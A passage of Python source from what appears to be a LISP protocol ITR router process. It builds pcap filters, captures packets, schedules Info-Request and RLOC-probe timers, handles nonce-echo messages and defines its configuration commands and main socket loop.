dst_pfilter[0:-4] # # If "lisp-nat = yes" is configured, then we are a PETR and we need # to accept packets for local EIDs (assigned to loopback interfaces). # So allow the first one to be accepted. # lisp_nat = getoutput("egrep 'lisp-nat = yes' ./lisp.config") lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ") loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None addr_pfilter = "" addresses = lisp.lisp_get_all_addresses() for addr in addresses: if (addr == loopback): continue addr_pfilter += "{}".format(addr) if (addresses[-1] == addr): break addr_pfilter += " or " #endif if (src_pfilter != ""): src_pfilter = " and (src net {})".format(src_pfilter) #endif if (dst_pfilter != ""): dst_pfilter = " and not (dst net {})".format(dst_pfilter) #endif if (addr_pfilter != ""): addr_pfilter = " and not (dst host {})".format(addr_pfilter) #endif # # A PITR wants to see packets from anywhere so it can encap to possible # LISP sites. But we want the kernel to route and consume for RLOCs for # this system. # if (pitr): dst_pfilter = "" addr_pfilter = addr_pfilter.replace("dst ", "") #endif # # Concatenate all the filters. # pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter pfilter += probe_pfilter pfilter += decent_pfilter lisp.lprint("Using pcap filter: '{}'".format(pfilter)) return(pfilter) #enddef # # lisp_itr_pcap_thread # # Receive LISP encapsulated packet from pcap. # def lisp_itr_pcap_thread(device, pfilter, pcap_lock): lisp.lisp_set_exception() if (lisp.lisp_is_python2()): import pcappy pcap_lock.acquire() pcap = pcappy.open_live(device, 9000, 0, 100) pcap_lock.release() pcap.filter = pfilter pcap.loop(-1, lisp_itr_pcap_process_packet, device) #endif if (lisp.lisp_is_python3()): import pcapy pcap_lock.acquire() pcap = pcapy.open_live(device, 9000, 0, 100) pcap_lock.release() pcap.setfilter(pfilter) while(True): header, packet = pcap.next() if (len(packet) == 0): continue lisp_itr_pcap_process_packet(device, None, packet) #endwhile #endif return #enddef # # lisp_itr_process_info_timer # # Time to send a periodic Info-Request message. This must be done less often # then sending periodic Map-Registers as well as less the the NAT timeout # value which is usually one minute. # def lisp_itr_process_info_timer(): global lisp_itr_info_timer global lisp_ephem_nat_socket global lisp_send_sockets lisp.lisp_set_exception() # # Build Info-Request messages if we have any private RLOCs in database- # mappings. # sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket, lisp_ipc_listen_socket] lisp.lisp_build_info_requests(sockets, None, lisp.LISP_CTRL_PORT) # # Restart periodic timer. # lisp_itr_info_timer.cancel() lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL, lisp_itr_process_info_timer, []) lisp_itr_info_timer.start() return #enddef # # lisp_itr_map_resolver_command # # Call lispconfig.lisp_map_resolver_command and set "test-mr" timer. # def lisp_itr_map_resolver_command(kv_pair): global lisp_send_sockets global lisp_ephem_port global lisp_itr_info_timer lispconfig.lisp_map_resolver_command(kv_pair) if (lisp.lisp_test_mr_timer == None or lisp.lisp_test_mr_timer.is_alive() == False): lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr, [lisp_send_sockets, lisp_ephem_port]) lisp.lisp_test_mr_timer.start() #endif # # Trigger a Info-Request if we are doing NAT-traversal. # lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, []) lisp_itr_info_timer.start() return #enddef # # lisp_itr_database_mapping_command # # Add database-mapping entry so ITR can packet capture on packets only from # sources from the *first* database-mapping configured. # def lisp_itr_database_mapping_command(kv_pair): lispconfig.lisp_database_mapping_command(kv_pair) return #enddef # # lisp_itr_xtr_command # # Call lispconfig.lisp_xtr_command() but pass socket parameters to starting # the RLOC-probing timer if "rloc-probing = yes". # def lisp_itr_xtr_command(kv_pair): global lisp_ephem_listen_socket global lisp_rloc_probe_socket # # Cache current state for nat-traversal and rloc-probing so we know if # we should trigger.. # nat_traversal = lisp.lisp_nat_traversal rloc_probing = lisp.lisp_rloc_probing # # Execute command. # lispconfig.lisp_xtr_command(kv_pair) # # Did "nat-traversal = yes" or "rloc-probing = yes" just happen? # nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \ lisp.lisp_rloc_probing) rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing) interval = 0 if (rloc_probing_now_on): interval = 1 if (nat_now_on): interval = 5 if (interval != 0): lisp_sockets = [lisp_rloc_probe_socket, lisp_ephem_listen_socket] lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets) #endif # # If nat-traversal=yes and data-plane-security=yes on an ITR, then we # need to set source port in RLOC-probe requrests and encapsulated data # packets to be the same value. # if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security): port = lisp_ephem_listen_socket.getsockname()[1] lisp.lisp_crypto_ephem_port = port lisp.lprint("Use port {} for lisp-crypto packets".format(port)) entry = { "type" : "itr-crypto-port", "port" : port } lisp.lisp_write_to_dp_socket(entry) #endif # # Write to external data-plane if enabled. # lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging, lisp.lisp_data_plane_logging) return #enddef # # lisp_itr_process_nonce_ipc # # Process an nonce IPC message from the ETR. It wants to tell us that a # request-nonce was received and we need to echo it or when this ITR requested # a nonce to be echoed, the ETR is telling us it has been echoed. # # Variable "ipc" is a string and not a byte string. Caller converts. # def lisp_itr_process_nonce_ipc(ipc): x, opcode, rloc_str, nonce = ipc.split("%") nonce = int(nonce, 16) echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str) if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str) # # If we are in request-nonce mode, exit it, so we can echo the nonce the # other side is requesting. # if (opcode == "R"): echo_nonce.request_nonce_rcvd = nonce echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp() echo_nonce.echo_nonce_sent = nonce echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp() lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \ lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce))) #endif if (opcode == "E"): echo_nonce.echo_nonce_rcvd = nonce echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp() if (echo_nonce.request_nonce_sent == nonce): en = lisp.bold("echoed nonce", False) lisp.lprint("Received {} {} from {}".format(en, lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False))) echo_nonce.request_nonce_sent = None lisp.lprint("Stop request-nonce mode for {}".format( \ lisp.red(echo_nonce.rloc_str, False))) echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp() else: rns = "none" if (echo_nonce.request_nonce_sent): rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent) #endif lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \ "nonce is {}").format(lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False), rns)) #endif #endif return #enddef # # ITR commands procssed by this process. # lisp_itr_commands = { "lisp xtr-parameters" : [lisp_itr_xtr_command, { "rloc-probing" : [True, "yes", "no"], "nonce-echoing" : [True, "yes", "no"], "data-plane-security" : [True, "yes", "no"], "data-plane-logging" : [True, "yes", "no"], "frame-logging" : [True, "yes", "no"], "flow-logging" : [True, "yes", "no"], "nat-traversal" : [True, "yes", "no"], "checkpoint-map-cache" : [True, "yes", "no"], "ipc-data-plane" : [True, "yes", "no"], "decentralized-push-xtr" : [True, "yes", "no"], "decentralized-pull-xtr-modulus" : [True, 1, 0xff], "decentralized-pull-xtr-dns-suffix" : [True], "register-reachable-rtrs" : [True, "yes", "no"], "program-hardware" : [True, "yes", "no"] }], "lisp interface" : [lispconfig.lisp_interface_command, { "interface-name" : [True], "device" : [True], "instance-id" : [True, 0, 0xffffffff], "dynamic-eid" : [True], "multi-tenant-eid" : [True], "lisp-nat" : [True, "yes", "no"], "dynamic-eid-device" : [True], "dynamic-eid-timeout" : [True, 0, 0xff] }], "lisp map-resolver" : [lisp_itr_map_resolver_command, { "mr-name" : [True], "ms-name" : [True], "dns-name" : [True], "address" : [True] }], "lisp map-server" : [lispconfig.lisp_map_server_command, { "ms-name" : [True], "address" : [True], "dns-name" : [True], "authentication-type" : [False, "sha1", "sha2"], "authentication-key" : [False], "encryption-key" : [False], "proxy-reply" : [False, "yes", "no"], "want-map-notify" : [False, "yes", "no"], "merge-registrations" : [False, "yes", "no"], "refresh-registrations" : [False, "yes", "no"], "site-id" : [False, 1, 0xffffffffffffffff] }], "lisp database-mapping" : [lisp_itr_database_mapping_command, { "prefix" : [], "mr-name" : [True], "ms-name" : [True], "instance-id" : [True, 0, 0xffffffff], "secondary-instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "dynamic-eid" : [True, "yes", "no"], "signature-eid" : [True, "yes", "no"], "register-ttl" : [True, 1, 0xffffffff], "rloc" : [], "rloc-record-name" : [True], "elp-name" : [True], "geo-name" : [True], "rle-name" : [True], "json-name" : [True], "address" : [True], "interface" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp map-cache" : [lispconfig.lisp_map_cache_command, { "prefix" : [], "instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "send-map-request" : [True, "yes", "no"], "subscribe-request" : [True, "yes", "no"], "rloc" : [], "rloc-record-name" : [True], "rle-name" : [True], "elp-name" : [True], "address" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, { "prefix" : [], "instance-id" : [True, 0, 0xffffffff], "eid-prefix" : [True], "group-prefix" : [True], "rloc" : [], "rloc-record-name" : [True], "rle-name" : [True], "elp-name" : [True], "address" : [True], "priority" : [True, 0, 255], "weight" : [True, 0, 100] }], "lisp explicit-locator-path" : [lispconfig.lisp_elp_command, { "elp-name" : [False], "elp-node" : [], "address" : [True], "probe" : [True, "yes", "no"], "strict" : [True, "yes", "no"], "eid" : [True, "yes", "no"] }], "lisp replication-list-entry" : [lispconfig.lisp_rle_command, { "rle-name" : [False], "rle-node" : [], "address" : [True], "level" : [True, 0, 255] }], "lisp geo-coordinates" : [lispconfig.lisp_geo_command, { "geo-name" : [False], "geo-tag" : [False] }], "lisp json" : [lispconfig.lisp_json_command, { "json-name" : [False], "json-string" : [False] }], "show itr-map-cache" : [lisp_itr_show_command, { }], "show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }], "show itr-keys" : [lisp_itr_show_keys_command, {}], "show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }] } #------------------------------------------------------------------------------ # # Main entry point for process. # if (lisp_itr_startup() == False): lisp.lprint("lisp_itr_startup() failed") lisp.lisp_print_banner("ITR abnormal exit") exit(1) #endif socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket, lisp_ephem_nat_socket, lisp_ipc_punt_socket] # # Should we listen to the map-cache/punt IPC socket if it exists. # listen_on_ipc_socket = True ephem_sockets = [lisp_ephem_listen_socket] * 3 ephem_nat_sockets = [lisp_ephem_nat_socket] * 3 while (True): try: ready_list, w, x = select.select(socket_list, [], []) except: break # # Process Punt signal message from another data-plane (snabb). # if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list): lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets, lisp_ephem_port) #endif # # Process Map-Reply messages received on ephemeral port. # if (lisp_ephem_listen_socket in ready_list): opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0], False) if (source == ""): break if (lisp.lisp_is_rloc_probe_reply(packet[0:1])): lisp.lprint("ITR ignoring RLOC-probe reply, using pcap") continue #endif lisp.lisp_parse_packet(ephem_sockets, packet, source, port) #endif # # Process Info-Reply messages received on NAT ephemeral port. # if (lisp_ephem_nat_socket in ready_list): opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0], False) if (source == ""): break if (lisp.lisp_is_rloc_probe_reply(packet[0:1])): lisp.lprint("ITR ignoring RLOC-probe reply, using pcap") continue #endif probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port) # # Info-Reply has new RTR-list, RLOC-probe the RTR RLOCs so we can # lisp-crypto faster. # if (probe): lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket] lisp.lisp_start_rloc_probe_timer(0, lisp_sockets) #endif #endif # # Process either commands, an IPC data-packet (for testing), or any # protocol message on the IPC listen socket. # if (lisp_ipc_listen_socket in ready_list): opcode, source, port, packet = \ lisp.lisp_receive(lisp_ipc_listen_socket, True) if (source == ""): break if (opcode == "command"): packet = packet.decode() if (packet == "clear"): lisp.lisp_clear_map_cache() continue #endif if (packet.find("nonce%") != -1): lisp_itr_process_nonce_ipc(packet) continue #endif lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode, packet, "lisp-itr", [lisp_itr_commands]) elif (opcode == "api"): packet = packet.decode() lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet) elif (opcode == "data-packet"): lisp_itr_data_plane(packet, "ipc") else: if (lisp.lisp_is_rloc_probe_reply(packet[0:1])): lisp.lprint("ITR ignoring RLOC-probe request, using pcap") continue #endif lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port) #endif #endif #endwhile lisp_itr_shutdown() lisp.lisp_print_banner("ITR normal exit") exit(0) #------------------------------------------------------------------------------